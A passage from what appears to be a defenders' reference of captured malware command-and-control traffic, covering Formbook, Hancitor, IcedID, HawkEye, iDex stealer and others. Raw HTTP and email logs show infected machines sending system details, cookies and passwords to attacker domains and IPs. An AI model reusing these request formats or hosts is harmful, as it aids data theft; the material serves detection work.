Sbh=A2oUV0jxRNQErH6gY3lxQtOCTuQwNTdWJ25sTcda3oav(0QcLnkBrePt5vgAKuqyhbAftuJA5G5D2fNVsLRL8o7GMMvu8SY6wR8pwXAraJm4TKmuw5(TglqswaX2VpD_gJ3yal4FZ1pkDvEP81iuj_l_mMoqsdCGaFMxmu8LQC1CZjkxIXbFtlEaQg0Wfzvxpk9XRS39rZxxdqjALdRL8_N2LHRzPN35WuoIIn2J0mUB7u7x~42TwXHpZcLTJ4cELO23a_seXaFdgz~QWrxi7L3N9oGrwrY4tSxRUCsHQCoAB8CsxlUDIkY67TYTnYPmJxKxE06yA9NA5buPXUU-rDGiNGDQ25(b371m2NNnyheUxDNxyL6wr0syvlQ7Qn~DvzJO1j4_01FUfdeQKDmT9nuRD7AXJYaO3DIZnG1RWkvBxF0H38hB8-R7b1kP1IZqlFNLuC1ttRMUWPoRYyiYb-5rzJXywgOQncCVwVXcwH8dkVBf8nIw1doGRbV0yBZciG1vmCQMiyqspdkDVZt-1KyQhCCDaZWgyx(jUEtrJ5ZzRRfL7eaLGAG1u46ihMFAoJdDXorJcFL051WdJ2wHBfyMv2c9wu1j78lVpEWNkON2Qnw-8VOoQrg4ItHc4WjdsmkjCk(8A-d-uwY70GE0UXkWhPpg~_8qCqj_XNsXD1Cku4u0im9ibvYCLeQyYDn_FmL-U7ZNtOIbYeTHchiTz3fwdILdormZDVBuDzJlRACku5YKuqCIZoTnxUBI(iGkeX0da3GEkWCi8MA6nuA390kyWjwjSpzGHFYPG0B41C5bU5KrJx(9qiFYNfQPZqv5KDyJL8tN7jrqIny7WzTVRqvRHCeerIFPL5vosxC_3QvH2AlElM8Ssx(QZqz22ySsvMzyq8Hv~3tMLtg8mgzByn2dH2WrNAM3nk~XXu(6GurJtah4M9tPmohFGPLZxX5e3WCJ~h16eNNM4OaV~MOGVYusVrPgqFUS6P7iizTBZS(MsulNfuAKYvUq2kUMtCYSZAt34TUY6bJ5BTPy~4ydE8n16XohSRP8VbqhLAZ4DGO2n-hfrK2o9oUsNUWcpZyKA2(9kXBftM3s5lzWT21wBKbcPaiPURUuV4eheOkTBTxTB_mMxCafVVE6yvbJD-XIpSazCu(sS7~QUEbh6EPrqsB11rhKlRPy39G2rLo6lSMHeGjCmI5Rc80lhtZyFKcqhNYbhwuiEn3uK9CodgYxVie6yY1MwI(M8VSBZ-zQjldjXnFN~7oKDW3JglzgbK3lzeDK5aRb0HTwohxi8M9lRkTKflhtcr77iOlBVcE6HYSbchngmsBWBgPwA75xvzJhUUtgjJlxLW~bSPMG7x7GLVfCZjxxrjki0R9ZPDVdx71eP4yoIdymwRgqddVSuGCAIf641vyoItI9QzfvvuZBdpRQi3ZEw7LUifYAyjYZ2Xd9KdOMiNiLLeLsDCgWib~5r8iSfExWtFjsEgOt(2W_0JQSAgplkqJxkO9YxSdB9xsPfeavxYirf7azw7UGnDTEMQUnMMECFM5_v29oh6tKvIolHPv_qZrW0nGwd0aCMfzUqcV0(NlfiEQOxVZTonlWkJoR3hyyZQ~dKGW9j_WbA-8s54GvC-VC~skS2jG4haG9bxKA6QZqRK4-2qI5o2U3rNoeQEz_~yMfZ2fQoftvSkgpJfcgjuh3qTOFK8b6OSe5wMnyLdniF_4xN3rO(73lGUB5l60LbBa4TAYc(Qn7pyfvhlhMx8nr0vm6kCom1xi-VN1M(fSDqNubOVR_8QORONDFaX41G3HYOrWQyQ5Cvd6lAFgWycF3KeaumEH0LEUP7vR3t8CqgQ5VqyDxtKNy0Z7MVbqsq6s8~aYdnUL5DxSG9pbe8LW4uDqLcBuZ2WiDWmdiRx0cbf9-s0qx6mSwAo(Wz67SmWp2X8VI3W4h3M3vf9BggKJQmHp7nLChKFWJWTuEGt43fxqjimz5WaRYtGOcdlH84XYvX9kEB1C4(Fp99P6VKHhrkuCOrtiirAvl7KvjXYhsiOn20cjKKUL6l8(aZofg6g(CqTpB5dDGN86Korg1L6advz28Cc9QidH5ZPIAHrWXi9nG5FtnBxG-3R2N(J6V~IGsC8NZIwv0qB~35YLhS9SlyD38(p(pgy9N3fPHO9Gzlzd6D3j74fN-N89jhcQTClusyQIhdjrYsqWnpi7Of2Hl9zRx(ut-kFP33A5zYLbDn54f9gg8kH1m(BeKfVXxVtpGLR4VQSBfZzVwPGnUei9aJDZkXwmg0xftRV~S3TxUucpU1d75Pa9NCvgMU51f7uv0XtF1S-0_nqUy(apdab1FJcSzLOVDXJDyOKr5P4px5QpKM1FZgH9mgQQZuo~rlcBi4jISUNx3qv7fwaBZ4KDYuICC1-KLeFh0i7YEU_njjPm31uzkYLlVxfbhAg6C7Fxcpr5_jzhW~me85m48ifV4C06qNAN5WgIGxJW07CUNAuLx2d4tZI85EWgoxQa3AOuINyalNllQZt2LBB~ReVqa8Gr3pLpZOSiDREVqDaruTFqNwAZndKWZ~CTIV4ss6txpH7ypXw3AZ4fiDn5j7NDtaJzXbptIpWgrv9yK(zab71BYxnEuPpsdZSnA2QWY9s300CraaT3RPj(gdt~5OjaG22qma1M9LYzgvBdIBH57aizchPopkjnWiJAuvabKSvJyEtKb5Ni67H1WbOnOKM8pMcqsaIBi1AfQV0PbikKmG-HikPS86JBnJXZs8BWrbgm7g8uGrVpnnuHbHuP4p4xAOgYNPDbnpSoXn0kH~vUc1JxLurnAnNWMmYgA5g3fIw7HGvJSnKn6DDHod7HUKWF3ggfFJdZbucZxbJ2fpE64O6nKFy9It-R0BRZqcunVVvWy4zwCQ_1brWO78sSQY3WY4Es8kI6nl5hc9k3dhAWgQJWeqVrUGnOyxnf3wP9Tjc3fbhhfMthKeTVJEn485mDsUhxaOlIUrAoNDk1Kmua8F3zzcHpo~ixmjApivEsgkkIIni~mHnw4sce0IaJmWT9Ka_FCRQTC3dNAkBJHjcfTsYpgDvJBeZI8V7tnXTcJwQShoQoTdzOUvebgdia2s6HyC8Ay3lybE0Kvi4Ufu2qeJDnpSdiZAi8Ba-AzxnhL~66T~sQU0SY1ZDTJsdMD9zA8h5A0g71lMEIFSEdczwnvBeXpuEiaX9FOoJQwoIyyq4KmaeML~f5ipBL5MgqKf36tQ4N9jiM0IMAZdarP~ZkdSRs6dnJ7bU4FFMvQUrM0EGSJMQfLAvB7d_c0IwGUl44oifYX7n8cNJQcRPEFt1PZYPKE47I_JQ2CSVE9Scfi6hmF2mrjjozj0NQFcK5B~W~c3GpQxJ8e9cNoWhrkZNK1CyKcuTjHkfWA5Bzoi5p5mrTFsA12M25Ubt5SuEd-grtNyFbdev6Uyoislno4UJ9J6-8ag6iZXJd_QI17cAFS4P71bi7ApOh50qN4cNMIQBUTQyriS5BG~os6RMAuoaSUq92eNx12764W~RIGssW6ItGJFcg09D9nPLTs9jUhkhVwPicIhcak5ZLrkASapi44847mp8bI7hAIINPrZaKEyXejiDm5OUm7UVGno15_(251Jq3-Aic6sgovlTvlWBTFSkikUCmSMDX96nLlTuNiC2BD42WLJfGoZQw4T341YKl3rFShZ24mtmUGThc4k-k1OxGK1ygo5wLOg_H_Bs9MfxPn3aoIQiBq(XC7l4Xzw2LREItIvFPQXoWU(dxz3g).. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/formbook.png "Formbook") #### GET2Loader (TA505): ~~~ POST /2021 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; CIBA; MS-RTC LM 8) Content-Length: 95 Host: windows-sys-update.com &D=User-PC&U=admin&OS=6.1&PR=Dwm.exe%7CEXCEL.EXE%7CExplorer.EXE%7Ctaskhost.exe%7Cwindanr.exe%7CHTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Wed, 09 Oct 2019 18:53:18 GMT Content-Length: 0 Connection: keep-alive ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ta505-loader.png "TA505 Loader") #### Glupteba ~~~ POST /bots/post-ia-data?uuid=de7cfeb2-8d6a-480d-9043-488b8a616d7b HTTP/1.1 Host: venoxcontrol.com User-Agent: Go-http-client/1.1 Content-Length: 8843 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip [{"display_name":"Security Update for Microsoft Office 2010 (KB2289161)","display_version":"","install_date":""},{"display_name":"DXM_Runtime","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030","display_version":"11.0.61030","install_date":"20180208"},{"display_name":"Microsoft Office Proof (French) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Security Update for Microsoft Office 2010 (KB2289078)","display_version":"","install_date":""},{"display_name":"Microsoft Outlook Social Connector (KB2289116) ..........s","display_version":"","install_date":""},{"display_name":"Definition update for Microsoft Office 2010 (KB982726)","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2010 (KB2409055)","display_version":"","install_date":""},{"display_name":"IEData","display_version":"","install_date":""},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Microsoft Office Proof (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Shared 32-bit MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Microsoft Office Professional 2010","display_version":"14.0.4763.1000","install_date":""},{"display_name":"Microsoft Office Publisher MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Outlook MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft Office 2010 (KB2202188)","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173","display_version":"","install_date":""},{"display_name":"Google Update Helper","display_version":"1.3.33.23","install_date":"20190319"},{"display_name":"IE40","display_version":"","install_date":""},{"display_name":"IE4Data","display_version":"","install_date":""},{"display_name":"Java 8 Update 92 (64-bit)","display_version":"8.0.920.14","install_date":"20180208"},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"VLC media player","display_version":"2.2.6","install_date":""},{"display_name":"WinRAR 5.60 (64-bit)","display_version":"5.60.0","install_date":""},{"display_name":"Microsoft Office Single Image 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Access Setup Metadata MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Adobe Flash Player 27 PPAPI","display_version":"27.0.0.187","install_date":""},{"display_name":"Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Mozilla Firefox 67.0.4 (x64 en-US)","display_version":"67.0.4","install_date":""},{"display_name":"SchedulingAgent","display_version":"","install_date":""},{"display_name":"Microsoft Office Excel MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Office Shared MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Skype... 7.39","display_version":"7.39.102","install_date":"20180208"},{"display_name":"CCleaner","display_version":"5.35","install_date":""},{"display_name":"Microsoft .NET Framework 4.7.2","display_version":"4.7.03062","install_date":"20190321"},{"display_name":"Microsoft Office Access MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft Office 2010 (KB2413186)","display_version":"","install_date":""},{"display_name":"Adobe Acrobat Reader DC MUI","display_version":"15.007.20033","install_date":"20180208"},{"display_name":"MPlayer2","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161","display_version":"9.0.30729.6161","install_date":"20180208"},{"display_name":"Microsoft Office Proofing (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Microsoft Office Proof (Spanish) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702","display_version":"14.21.27702","install_date":"20190321"},{"display_name":"Adobe Flash Player 27 ActiveX","display_version":"27.0.0.187","install_date":""},{"display_name":"Adobe Flash Player 27 NPAPI","display_version":"27.0.0.187","install_date":""},{"display_name":"Google Chrome","display_version":"75.0.3770.100","install_date":"20180208"},{"display_name":"Microsoft Office Word MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Update for Microsoft OneNote 2010 (KB2433299)","display_version":"","install_date":""},{"display_name":"Microsoft Office OneNote MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20180208"},{"display_name":"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573","display_version":"","install_date":""},{"display_name":"Realtek AC'97 Audio","display_version":"","install_date":""},{"display_name":"MobileOptionPack","display_version":"","install_date":""},{"display_name":"Microsoft Office PowerPoint MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702","display_version":"14.21.27702.2","install_date":""},{"display_name":"Update for Microsoft .NET Framework 4.7.2 (KB4087364)","display_version":"1","install_date":""},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_version":"11.0.61030.0","install_date":""},{"display_name":"AddressBook","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Word 2010 (KB2345000)","display_version":"","install_date":""},{"display_name":"Microsoft Office Shared Setup Metadata MUI (English) 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Microsoft .NET Framework 4.7.2","display_version":"4.7.03062","install_date":""},{"display_name":"Connection Manager","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2010 (KB2289161)","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20180208"},{"display_name":"Mozilla Maintenance Service","display_version":"67.0.4","install_date":""},{"display_name":"Notepad++ (64-bit x64)","display_version":"7.5.1","install_date":""},{"display_name":"WIC","display_version":"","install_date":""},{"display_name":"QEMU guest agent","display_version":"2.10.68","install_date":"20190730"},{"display_name":"Update for Microsoft Outlook Social Connector (KB2289116)","display_version":"","install_date":""},{"display_name":"Microsoft Office Office 32-bit Components 2010","display_version":"14.0.4763.1000","install_date":"20180126"},{"display_name":"Java Auto Updater","display_version":"2.8.92.14","install_date":"20180208"},{"display_name":"DirectDrawEx","display_version":"","install_date":""},{"display_name":"IE5BAKEX","display_version":"","install_date":""},{"display_name":"Opera 12.15","display_version":"12.15.1748","install_date":""},{"display_name":"Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219","display_version":"10.0.40219","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 2005 Redistributable (x64)","display_version":"8.0.61000","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030","display_version":"11.0.61030","install_date":"20180208"},{"display_name":"Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501","display_version":"12.0.30501.0","install_date":""}] ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-1.png "Glupteba") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-2.png "Glupteba") #### Godzilla Loader ~~~ GET /gate16.php?g=-994429369&k=7NLp9MrFuKWnfhYAmxKEcsWO2 HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: filesdb.ru Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Sat, 01 Sep 2018 12:12:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: PHPSESSID=btq14ialn2bbefrsvedfspt9s4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip
IKqglmKsWN8CSCWpwIItt6O/sFpxceFdZPucGXeeUi1CbtjgXllqiSnOcsojWNxNP8ySG4XsKU94bKJh2vFSAtqb+g939WslRHMzKsr2YaDwN51PG9a/CZ/BVaK3Idznf3tkNJAy9+6r6vj/9spjxPp1+pqK3DrdVr7uJG0xkSv8Ez7fmCPgc4YrHpSk2cMvODT9bbv1eNE4zjGd+N4t3Lhp/+k48QWtGIQ48A6Q9HzhWO1L4SpVawEVg/hbN+EJSCVhQCIljVpvrcyeY6w1yX9QT5TSZosQlbzog3mLceYYz1teNlHwhGToXVDb9ACyxlo/FrdlapR/R0jCx0F+OQ==
~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/godzilla.png "Godzilla Loader") #### GrandSteal ~~~ GET /websocket HTTP/1.1 Host: 162.218.122.115:2012 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: Yzg2MDllOTctZGYzMCOOZQ== Origin: ws://162.218.122.115:2012 HTTP/1.1 101 Switching Protocols Server: nginx Date: Fri, 18 Oct 2019 00:41:37 GMT Connection: upgrade Upgrade: WebSocket Sec-WebSocket-Accept: 3pYl7XQW+GMu4ydBWBEUXbuIKJo= .þ... o>..Í8).i<. e-_A.Mjc.WjN.mjT.WaG.,.U.SnJ%._y.>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o> . o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o> . o>. o>. o>. o>. o>. o>. o>. o>. o>. o> .~..."ª..Ê.......... .(.8.@...ugmajJAPYc ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/grandsteal.png "GrandSteal") #### Hancitor ~~~ POST /4/forum.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: spausence.com Content-Length: 108 Cache-Control: no-cache GUID=8996434259757519954&BUILD=0210_328487&INFO=USER-PC @ USER-PC\admin&IP=89.187.165.57&TYPE=1&WIN=6.1(x64)HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Thu, 03 Oct 2019 17:17:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.45 FFUUARZAEg4OCkBVVQ0NDVQVFB8eEx0TGBUCVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVCRcbCA5XCRYTHh8IV0lVExQZFg8eHwlVSwYSDg4KQFVVDQ0NVA4SGVcbFBQfAlQZFRdVDQpXGRUUDh8UDlVLBhIODgpAVVUXGw4fCBMbFlcUHwgPHlQID1UNClcTFBkWDx4fCVUKFRcVVUsGEg4OCkBVVRkWHwwfCB8eDxkbDhMVFFQZFRdUGw9VDQpXExQZFg8eHwlVDRMeHR8OCVVLBhIODgpAVVUfGRsIHwoSVBUIHVUNClcZFRQOHxQOVQoWDx0TFAlVGBgKFQ0fCAobGRFVExQZFg8eHwlVSwcBGEASDg4KQFVVDQ0NVBUUHx4THRMYFQJUGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUJFxsIDlcJFhMeHwhXSVUTFBkWDx4fCVVIBhIODgpAVVUNDQ1UDhIZVxsUFB8CVBkVF1UNClcZFRQOHxQOVUgGEg4OCkBVVRcbDh8IExsWVxQfCA8eVAgPVQ0KVxMUGRYPHh8JVQoVFxVVSAYSDg4KQFVVGRYfDB8IHx4PGRsOExUUVBkVF1QbD1UNClcTFBkWDx4fCVUNEx4dHw4JVUgGEg4OCkBVVR8ZGwgfChJUFQgdVQ0KVxkVFA4fFA5VChYPHRMUCVUYGAoVDR8IChsZEVUTFBkWDx4fCVVIBwEIQBIODgpAVVUNDQ1UFRQfHhMdExgVAlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQkXGwgOVwkWEx4fCFdJVRMUGRYPHh8JVUkGEg4OCkBVVQ0NDVQOEhlXGxQUHwJUGRUXVQ0KVxkVFA4fFA5VSQYSDg4KQFVVFxsOHwgTGxZXFB8IDx5UCA9VDQpXExQZFg8eHwlVChUXFVVJBhIODgpAVVUZFh8MHwgfHg8ZGw4TFRRUGRUXVBsPVQ0KVxMUGRYPHh8JVQ0THh0fDglVSQYSDg4KQFVVHxkbCB8KElQVCB1VDQpXGRUUDh8UDlUKFg8dExQJVRgYChUNHwgKGxkRVRMUGRYPHh8JVUkH ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hancitor.png "Hancitor") #### Hawkeye keyogger ~~~ From: mosharrof@mhcapparels.com To: mosharrof@mhcapparels.com Date: 9 Oct 2019 01:57:35 +0100 Subject: HawkEye Keylogger - Reborn v9 - Passwords Logs - admin \ USER-PC - 89.187.165.47 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: base64 SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNClBhc3N3b3JkcyBMb2dzDQphZG1p biBcIFVTRVItUEMNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT0NClVSTCAgICAgICAgICAgICAgIDogaHR0cHM6Ly9tLmZhY2Vi b29rLmNvbQ0KV2ViIEJyb3dzZXIgICAgICAgOiBGaXJlZm94IDMyKw0KVXNlciBOYW1l ICAgICAgICAgOiBob25leUBwb3QuY29tDQpQYXNzd29yZCAgICAgICAgICA6IGhvbmV5 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hawkeye.png "Hawkeye") #### Icedid ~~~ GET /photo.png?id=0181B9BACBCF3080870000000000FF40000001 HTTP/1.1 Connection: Keep-Alive Host: eurobable.com HTTP/1.1 200 OK Server: openresty Date: Wed, 16 Oct 2019 15:30:33 GMT Content-Type: application/octet-stream Content-Length: 605211 Connection: keep-alive Last-Modified: Tue, 08 Oct 2019 11:43:19 GMT ETag: "5d9c7657-93c1b" Accept-Ranges: bytes .PNG . ... IHDR..............N.T....sRGB.........gAMA......a.... pHYs..........o.d. ;.IDATOLrEV.....Le.D|...Rp.{..D...g`...a@.\8,E .~1Z..X.N...^G.....,f$.c.......ru.#O..'.~. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid-2.png "Icedid") URI for websocket is usually data2.php ~~~ GET /data2.php?1C00C7CC98D464FE HTTP/1.1 Host: memphase.com Upgrade: websocket Connection: Upgrade HTTP/1.1 101 Switching Protocols Server: openresty Date: Thu, 10 Oct 2019 19:28:34 GMT Connection: upgrade Sec-WebSocket-Accept: Kfh9QIsMVZcl6xEPYxPHzW8SZ8w= Upgrade: websocket ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid.png "Icedid websocket") New Loader ~~~ GET / HTTP/1.1 Connection: Keep-Alive Host: karantino.xyz HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Mar 2020 16:07:26 GMT Content-Type: text/html Content-Length: 489 Connection: keep-alive Last-Modified: Wed, 29 Jan 2020 08:16:06 GMT ETag: "5e313f46-1e9" Accept-Ranges: bytes Site under reconstruction GET /background.png HTTP/1.1 Connection: Keep-Alive Cookie: __gads=3341780230:0:418500:437:83; _gat=10.0.16299.64; _ga=1.329443.0.66; _u=4445534B544F502D4A474C4C4A4C44:61646D696E; __io=21_1693682860_607145093_2874071422; _gid=92AA106A8DB0 Host: karantino.xyz HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Mar 2020 16:07:27 GMT Content-Type: image/png Content-Length: 314160 Connection: keep-alive .PNG . ... IHDR...............#&....sRGB.........gAMA......a.... pHYs..."...".........IDATx^....lKz..e....>...0.f.s.... f...`...J..."$...!Qv.a9...p..............6....|...+..#.2M.2 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedidloader.png "IcedID Loader") #### iDex Stealer ~~~ GET /index.php HTTP/1.1 Host: etips.fun Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx-reuseport/1.13.4 Date: Fri, 03 Apr 2020 12:43:55 GMT Content-Type: text/html Content-Length: 216 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/7.1.33 Set-Cookie: PHPSESSID=f9eaff206353e78017c4257960c13590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache YZAt44SJ3KsHldzHPnF8nveX4cBoS359sHzCXSUuwew/C6IEa7/zMjViaOVMK2EMfO1X+lcr24gD5S4LRuHREupBfWGdnGzfg5brXc1OuiMTRnOZ/iS9Vps9/B7Q+08m/137OU7V41UEx2QckwuZ9KeDTSjzmMv32Eewq0GUPiyQ5iFOOZ+8jGOXC1v8CsVqFfJYpKC2cCSLIQWDi6VzrQ== POST /gate.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accepts-Language: en-us,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------8d7d7ccad7ce23c Host: etips.fun Content-Length: 1191325 Expect: 100-continue -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="hwid" EEEB5D54788042A7B542739BBC26CF4B -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="os" Windows 7 x64 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="platform" null -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="user" admin -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="passwordCount" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="coins" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="forms" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="cookies" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="ccCount" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="telegram" 0 -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="steam" null -----------------------------8d7d7ccad7ce23c Content-Disposition: form-data; name="logs"; filename="Archive.zip" Content-Type: zip PK........|e.P.R.y........=...Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txt..]s.0.........r..b.V.Tk...CB.h......bggg........>y&..t2+u).26.>3.^..........(....$.C...o..n9.........P.4.fHTa9{OH.Q.I....?W...HG..&YC6 ..W.fR.9...x...E.r2..^.."....hM..|n.......e.Ef`+.P .!Lm....B.a.MQj..T.3W$..1....J..c.....n.. ....Zg!v;.....c..7r4.......X....(....}U.^...;.k.>....7PK........|e.P....i...Jr......Screenshot.png..w8[...o"v..G..Y#f..U]F......J.XE4}.......}...U...XuW.yq.|.....*.P....&.b.v.R.[......^.>..PK..........|e.P.R.y........=.................Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txtPK..........}e.PpT.-.... ...+.................Browsers/Cookies/Chrome_Default_Cookies.txtPK..........|e.P....i...Jr................Y...Screenshot.pngPK..........}e.P?c .T...Z... .................Passwords.txtPK..........}e.P.s%.[...v.................m...Browsers.txtPK..........}e.PE.............................Information.txtPK....................iDex STEALER VERSION : 1.0.0 ==========================GEOIP Info========================== IP : 84.17.36.75 Country : Sweden CountryCode : SE Region : AB Region Name : Stockholm City : Stockholm Zip : 164 94 TimeZone : Europe/Stockholm ISP : Datacamp Limited ==========================Hardware Info========================== Username : admin PCName : USER-PC UUID : 00371-461-1206131-85808 HWID : EEEB5D54788042A7B542739BBC26CF4B OS : Windows 7 x64 CPU : Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz GPU : Standard VGA Graphics Adapter RAM : 4 GB MAC : 5254004AAD21 Screen Resolution : 1280x720 Layout Language : English (United States) PC Time : 4/3/2020 12:43:57 PM (UTC) Coordinated Universal Time ==========================Program Info========================== Adobe Flash Player 27 ActiveX 27.0.0.187 Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 14.21.27702.2 ==========================Program Info========================== svchost lsm svchost spoolsv svchost lsass dllhost SearchProtocolHost svchost csrss e197329d5376b93a60e67a43d5390a16dae5e813c2ee3708420a785d8b1b1a46 csrss dwm services windanr wininit svchost SearchFilterHost taskhost svchost IMEDICTUPDATE SearchIndexer svchost explorer svchost OSPPSVC SearchProtocolHost svchost svchost winlogon smss System Idle -----------------------------8d7d7ccad7ce23c-- ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex1.png "iDex") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex2.png "iDex") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex3.png "iDex") #### iDex New aka MatrixMax stealer ~~~ POST /gate.php HTTP/1.1 Content-Type: 